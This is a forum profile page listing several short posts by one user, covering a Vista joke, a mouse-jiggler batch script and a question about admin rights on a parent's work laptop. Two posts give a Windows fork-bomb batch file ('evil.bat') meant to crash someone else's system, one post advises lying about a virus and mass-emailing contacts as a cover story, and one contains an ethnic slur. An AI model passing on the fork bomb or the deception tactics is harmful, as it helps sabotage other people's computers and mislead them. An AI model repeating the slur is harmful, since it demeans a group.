Jump to content

natural_orange

Active Members
  • Posts

    179
  • Joined

  • Last visited

Posts posted by natural_orange

  1. Dad: Why Won't Vista Make the computer run faster

    Me: Cuz it a piece of crap

    Dad: But shouldn't it run faster

    Me: You could put a corvette body on a honda, but in the end its still a stupid jap car that will only get you up to 60mph

    Me: Carbody=OS Engine=CPU

  2. how hard would it be to make a program that feeds a random mouse movement into the system that would keep the system alive?

    Ive look around some vb2005 stuff and i can't really find much

  3. evil.bat

    :start
    start evil.bat
    goto start

    That will make about a million command prompts that each will open a million command prompts.

    Which will after about 10 seconds will effectivley use up all system resouces and crash the system with some pretty graphics

  4. Name this batch evil.bat

    :start
    start evil.bat
    goto start

    That will repeadatly open new copies of itself which will open new copies of itself etc. etc. until all of his system resources are used up and the system crashes.

    or to open "websites" of an honorable nature:

    start http://www.website.com/
    start http://www.website.com/

    ** Use At Your Own Risk - I Take NO Responsibility for the use of the scripts provided Above ***

  5. Just say that a "virus" is on your computer or that somone hacked your email

    In fact send her a whole shit load of love email (all identical)  and every other person you know

    then they will believe you that it is a virus or a hacker

    Two Word: SOCIAL ENGINEERING

  6. After testing it for a while, it seems that while it does prevent the screensaver from coming on, it doesn't really prevent the computer from logging itself out...idk it seems kinda wierd.

    I imagine you could probably just take an old mouse and mod it with a microcontroller or something to keep the mouse moving around

  7. I saw on dl.tv about the "Mouse Jiggler" which is basically a $30 USB drive that makes the mouse move around and prevents the computer from putting the screensaver on or going into standby while a computer is being seized...

    Then when I was looking though the nircmd command list i noticed one called "movecursor" so i put together this simple script that will do the same purpose.

    @echo off
    echo Mouse Jiggler 1.0
    echo By: Natural_Orange 2007
    echo Press Ctrl-Break to End
    
    :Start
    nircmd cmdwait 500 movecursor 100 0
    nircmd cmdwait 500 movecursor 0 100
    nircmd cmdwait 500 movecursor -100 0
    nircmd cmdwait 500 movecursor 0 -100
    goto start

  8. I thought it was wierd because it parts of a corporate network. Although i wasn't connected to the domain.

    But i though most user would be put in the "Power Users" group more than the admin group.

    I understand giving them to run w/e programs and install w/e they want, but unrestricted access to everything on the computer just seems kinda wierd

  9. My dad has a leased laptop from dell that company gives him to use.  Its leased by his employer and they do all the IT work on it and stuff.

    The wierd thing was that when I got on it one time when he brought it home for the weekend, He Has FULL ADMIN RIGHTS on the laptop. 

    Is that the normal thing to do??? 

    He even has "run" command access.  He is even in the Administrators group on the computer.

    Mabey some of you sys admins can tell me what your laptop security polices are...

    And my dad really knows nothing at all about computer at all... he has difficulty figuring out which drive is the cd-drive on occasion...

×
×
  • Create New...